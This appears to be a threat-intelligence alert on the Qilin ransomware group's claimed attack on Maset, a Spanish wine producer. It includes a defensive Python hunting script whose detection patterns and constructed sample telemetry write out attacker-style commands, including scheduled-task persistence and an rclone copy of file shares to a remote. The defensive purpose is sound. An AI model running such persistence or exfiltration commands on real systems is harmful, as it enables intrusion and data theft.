Attack alert: Qilin targets Maset - ES
Introduction
On December 4, 2025, Maset, a Spanish producer of premium wines and spirits founded in 1956, was claimed as a victim by the Qilin ransomware group. The claim is classified at SIGNAL level under our XC classification. It concerns a family-owned company with 50 to 100 employees and about €25 million in annual revenue, and it comes amid a rise in attacks on the European agri-food sector, where customer data and production systems are attractive targets. The case raises the question of how well the digital infrastructure of Spanish SMEs in the food and beverage sector is actually protected.
The case illustrates how exposed mid-sized companies remain to organized ransomware operations. The claim record, timestamped on the Polygon blockchain, fixes the date of detection; it does not establish the scope of the breach. If the claim is accurate, the affected data could span the company's value chain, from customer information to the trade secrets behind its premium spirits. SIGNAL indicates a detected exposure that warrants immediate vigilance while the extent of any exfiltration is still being analyzed by our CTI teams.
Detailed analysis
The Spanish wine and spirits sector, representing a major economic and cultural heritage, is facing increasing digitization of its operations. While this digital transformation improves operational efficiency, it simultaneously exposes critical assets to cyber threats. For Maset, whose business relies on the reputation and trust of international distributors, the consequences of such a breach extend far beyond the technical realm to affect the brand itself.
The victim profile is consistent with Qilin's target selection: a company with a broad attack surface combining industrial production systems, customer databases and logistics networks. Nothing in the published claim identifies which of these served as the entry point. Pressuring a victim on several of these fronts at once is typical of the collective, which has operated for several years as a ransomware-as-a-service offering on the international scene.
Qilin, also known as Agenda, is one of the most capable ransomware operations currently run under a Ransomware-as-a-Service (RaaS) model. Active since 2022, the collective has compromised organizations of varying sizes across Europe and North America. Under the RaaS arrangement the core operators maintain the encryptor, the leak site and the negotiation infrastructure, while affiliates conduct the intrusions and hand over a share of each ransom; the operators thus multiply their reach without running every attack themselves.
Qilin's modus operandi relies on double extortion. Before encrypting, the attackers exfiltrate large volumes of sensitive data; they then threaten to publish it on their dedicated leak site if the victim does not pay, and payment buys no verifiable guarantee that the stolen copy is deleted. Files leaked from previous incidents show a marked preference for high-value data: intellectual property, financial information, customer data and strategic internal communications. The practical consequence is that restoring from backups addresses only half of the problem; the disclosure risk remains whatever the state of the systems.
Qilin affiliates most often gain access by exploiting unpatched vulnerabilities in internet-exposed systems, particularly VPN appliances and remote desktop services, or through targeted phishing of employees with privileged access. Once initial access is gained, they run network reconnaissance to map the infrastructure and identify high-value data before proceeding with exfiltration and encryption.
Notable victims of Qilin include manufacturing companies, healthcare facilities, and professional services firms in Europe and North America. The collective has demonstrated a remarkable capacity for adaptation, adjusting its tactics according to the defenses encountered. Their RaaS platform attracts technically skilled affiliates, which explains the variability observed in the initial attack vectors from one compromise to another.
On compromised systems the group maintains access through several backdoors in parallel and through living-off-the-land techniques, that is, abuse of administrative tools already present on the hosts (remote management, scheduling and scripting utilities) so that malicious activity blends into routine operations and leaves few artefacts for signature-based detection. This stealth typically lets the intruders remain for several weeks before encryption is triggered, maximizing the volume of exfiltrated data and the leverage for extortion. The defensive corollary is that by the time a ransom note appears, weeks of logs already hold evidence of the intrusion.
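As an added example, not part of the original alert and not Qilin's or any vendor's actual tooling, the following Python script shows how a defender would hunt for the pattern described in the last three paragraphs: a burst of discovery commands run with built-in Windows tools, persistence set up with the same tools, and bulk outbound transfer before encryption. It runs over constructed process-creation and flow records; the host names, the corp.example domain, the telemetry field names, the internal address ranges and the thresholds are all assumptions.

```python
"""Hunt for the pre-encryption phase described above, on constructed telemetry: a burst
of living-off-the-land discovery on one host, persistence set up with built-in tools,
and bulk transfer to an address outside the organisation. Field names are assumptions."""
from collections import defaultdict
from datetime import datetime, timedelta
import ipaddress, ntpath, re

# Signed Windows binaries that double as attacker tooling. Patterns are matched against
# the lower-cased command line; an empty pattern matches any invocation of the binary.
DISCOVERY = {
    "nltest.exe": r"/dclist|/domain_trusts",
    "net.exe": r"\bgroup\b.*domain admins|\bview\b|\buser\b.*/domain",
    "whoami.exe": r"/all|/priv",
    "systeminfo.exe": r"",
    "ipconfig.exe": r"/all",
}
PERSISTENCE = {"schtasks.exe": r"/create", "sc.exe": r"\bcreate\b",
               "reg.exe": r"\badd\b.*currentversion\\run"}
STAGING = {"rclone.exe", "7z.exe", "curl.exe", "winscp.exe"}
# The organisation's own ranges (assumed RFC 1918 here); anything else counts as external.
INTERNAL = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def classify(event):
    """Label one process-creation event: discovery, persistence, staging or None."""
    image = ntpath.basename(event["image"]).lower()
    cmd = event["cmdline"].lower()
    if image in DISCOVERY and re.search(DISCOVERY[image], cmd):
        return "discovery"
    if image in PERSISTENCE and re.search(PERSISTENCE[image], cmd):
        return "persistence"
    return "staging" if image in STAGING else None


def discovery_bursts(events, window=timedelta(minutes=30), min_tools=3):
    """Hosts on which >= min_tools distinct discovery binaries ran inside one window.
    One 'ipconfig /all' is admin noise; several tools in half an hour is hands-on recon."""
    per_host = defaultdict(list)
    for e in events:
        if classify(e) == "discovery":
            stamp = datetime.fromisoformat(e["ts"])
            per_host[e["host"]].append((stamp, ntpath.basename(e["image"]).lower()))
    flagged = {}
    for host, items in per_host.items():
        items.sort()
        for i, (start, _) in enumerate(items):
            tools = {tool for ts, tool in items[i:] if ts - start <= window}
            if len(tools) >= min_tools:
                flagged[host] = sorted(tools)
                break
    return flagged


def persistence_and_staging(events):
    """Per host, persistence and staging command lines, kept verbatim for the analyst."""
    out = defaultdict(lambda: {"persistence": [], "staging": []})
    for e in events:
        label = classify(e)
        if label in ("persistence", "staging"):
            out[e["host"]][label].append(e["cmdline"])
    return dict(out)


def exfil_candidates(flows, threshold_bytes=1 << 30):
    """Hosts that sent more than threshold_bytes to addresses outside INTERNAL."""
    totals = defaultdict(int)
    for f in flows:
        if not any(ipaddress.ip_address(f["dst"]) in net for net in INTERNAL):
            totals[f["host"]] += f["bytes"]
    return {h: b for h, b in totals.items() if b > threshold_bytes}


def triage(events, flows):
    """Combine the signals. Three or more on one host is the pre-encryption pattern:
    isolate the host and start scoping rather than opening a routine ticket."""
    bursts, extras, exfil = discovery_bursts(events), persistence_and_staging(events), exfil_candidates(flows)
    verdicts = {}
    for host in set(bursts) | set(extras) | set(exfil):
        signals = [name for name, hit in (
            ("discovery", host in bursts),
            ("persistence", bool(extras.get(host, {}).get("persistence"))),
            ("staging", bool(extras.get(host, {}).get("staging"))),
            ("exfil", host in exfil)) if hit]
        verdicts[host] = {"signals": signals, "severity": "isolate" if len(signals) >= 3 else "review"}
    return verdicts


# Constructed sample telemetry, not data from Maset or any real incident; the documentation
# ranges 203.0.113.0/24 and 198.51.100.0/24 stand in for external destinations.
def _ev(ts, host, image, cmdline):
    return {"ts": ts, "host": host, "image": image, "cmdline": cmdline}

SAMPLE_EVENTS = [
    _ev("2025-11-20T02:11:05", "WS-ADMIN-01", r"C:\Windows\System32\nltest.exe", "nltest /dclist:corp.example"),
    _ev("2025-11-20T02:13:40", "WS-ADMIN-01", r"C:\Windows\System32\net.exe", 'net group "Domain Admins" /domain'),
    _ev("2025-11-20T02:14:02", "WS-ADMIN-01", r"C:\Windows\System32\whoami.exe", "whoami /all"),
    _ev("2025-11-20T02:20:15", "WS-ADMIN-01", r"C:\Windows\System32\systeminfo.exe", "systeminfo"),
    _ev("2025-11-20T02:31:00", "WS-ADMIN-01", r"C:\Windows\System32\schtasks.exe", r"schtasks /create /sc onlogon /tn Updater /tr C:\ProgramData\u.exe"),
    _ev("2025-11-28T23:05:12", "WS-ADMIN-01", r"C:\ProgramData\rclone.exe", r"rclone copy D:\Shares remote:staging"),
    _ev("2025-11-20T09:02:00", "WS-SALES-07", r"C:\Windows\System32\ipconfig.exe", "ipconfig /all"),
]
SAMPLE_FLOWS = [
    {"host": "WS-ADMIN-01", "dst": "203.0.113.45", "bytes": 12 * 1024 ** 3},
    {"host": "WS-ADMIN-01", "dst": "10.20.0.5", "bytes": 40 * 1024 ** 3},  # internal backup target, ignored
    {"host": "WS-SALES-07", "dst": "198.51.100.7", "bytes": 50 * 1024 ** 2},
]
```

Calling `triage(SAMPLE_EVENTS, SAMPLE_FLOWS)` on the constructed data flags only WS-ADMIN-01, with all four signals and an "isolate" verdict, while the single `ipconfig /all` on WS-SALES-07 and its 50 MiB of egress produce nothing. The design point is that each rule on its own would drown an analyst in admin noise; it is the combination on one host, spread over a week in the sample, that matches the long-dwell pattern. In a real environment the regexes, the internal ranges and the egress threshold need tuning to the organisation's baseline, and the flow source must cover the VPN and remote-access paths named above, since that is where both the entry and the exfiltration typically transit.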
Maset has embodied Catalan winemaking excellence since its founding in 1956. Based in the Penedès region, this producer of premium wines and spirits has forged an international reputation thanks to its top-quality cavas and sparkling wines. With an estimated workforce of 50 to 100 employees, the family-owned company generates annual revenue of approximately €25 million, reflecting its premium positioning in European and international markets.
Maset's business revolves around artisanal production processes combined with modern winemaking and aging technologies. This duality necessitates a digital infrastructure that simultaneously manages the industrial control systems of the wineries, customer databases for direct sales, and B2B networks with international distributors. The progressive digitalization of these operations has created a large attack surface, particularly vulnerable to targeted intrusions such as the one orchestrated by Qilin in early December 2025.
Maset's supply chain extends across Europe and beyond, requiring complex digital coordination between vineyards, production facilities, warehouses, and business partners. While this interconnectedness optimizes operational efficiency, it exposes the company to the risk of lateral spread in the event of an initial breach. Customer data accumulated over decades, including order information, purchasing preferences, and contact details, constitutes a particularly sensitive asset with regard to the GDPR.
Maset's premium positioning relies heavily on the trust and brand reputation built over nearly seven decades. In the wine industry, where image and authenticity are paramount, a cyberattack revealing security vulnerabilities can have a disproportionate impact on customer perception. International distributors and high-end consumers expect high standards not only in product quality but also in the protection of their personal and business data.
Maset's location in Catalonia, a strategic wine region of Spain, places the company inside a dense agri-food ecosystem in which digital links between producers, cooperatives and distributors create systemic dependencies. A compromise at Maset could therefore reach its business partners if the attackers exploit established trust relationships, such as shared access or interconnected systems, to move from one organization to the next.
The SIGNAL classification means that a claim has been detected and requires immediate attention, but that no public confirmation of a large-scale data breach exists yet. Under our XC-Classify methodology this level suggests that Qilin likely exfiltrated sensitive information from Maset, while the exact scope and nature of the compromised data are still being assessed by our CTI analysts.
The claim record timestamped on the Polygon blockchain fixes December 4, 2025 as the date the claim was detected, which opens the analysis window. In typical Qilin cases the initial intrusion exploits unpatched vulnerabilities in internet-exposed systems or phishing aimed at employees with administrative privileges. For a company of Maset's size, plausible entry points include email servers, outdated VPN solutions and the management interfaces of connected production systems in the winery. These are generic hypotheses drawn from the group's past behaviour, not findings about Maset's actual vector.
Frequently asked questions
When did the attack by Qilin on Maset occur?
The attack was claimed by Qilin on December 4, 2025. That date is when the claim was detected; the intrusion itself likely began earlier.
Who is the victim of Qilin?
The victim is Maset, a food and beverage company located in Spain.
What is the XC protocol level for the attack on Maset?
The XC protocol level is currently SIGNAL, meaning the attack on Maset has been claimed by Qilin but has not yet been confirmed by our community.
Conclusion
Consistent with the dwell times observed in Qilin's other operations, the attackers likely held a stealthy presence inside Maset's infrastructure for several days, or even weeks, before the extortion phase began. That period is what allows affiliates to map the network, identify high-value data and establish persistence mechanisms that survive partial detection. For defenders the practical consequence is that the claim date marks the end of the intrusion rather than its start: log review, credential rotation and partner notification should cover the weeks before December 4, 2025, not only the days after it.